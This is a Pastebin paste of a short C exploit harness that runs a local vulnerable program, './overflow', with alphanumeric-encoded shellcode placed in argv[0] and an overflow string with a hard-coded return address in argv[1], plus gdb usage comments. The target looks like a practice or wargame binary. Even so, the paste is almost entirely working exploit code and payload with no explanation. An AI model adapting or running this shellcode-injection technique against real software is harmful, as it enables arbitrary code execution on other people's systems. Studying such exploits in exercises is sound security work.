SHARE
TWEET

Untitled

a guest Dec 8th, 2019 96 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // to use within gdb, use set exec-wrapper:
  2. // compile in shell: gcc e.c -o e -m32
  3. // then in gdb:
  4. // (gdb) set exec-wrapper ./e
  5. // (gdb) run
  6.  
  7. #include <stdio.h>
  8.  
  9. int main(void) {
  10.     char *args[3];
  11.     // put your shellcode in argv[0]
  12.     // must be alphanumeric to pass check in main() of ./overflow
  13.     args[0] = "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIBJS1yn4LEt3XFND42XbTPh0fbLU1awcX3QcBD9fOqxCFpecBqcQxPedoaqu4BHToqxrOBMnixcFQYYFQkbsZEUrxXMopSZs1CkmYjaDqkbe8ioKOkOsOsnFQIPlpOKHMk0AA";
  14.    // put your attack string here
  15.    args[1] = "@@@@AAAABBBB\x9d\xdd\xff\xff";
  16.    args[2] = NULL;
  17.    execve("./overflow", args, NULL);
  18. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top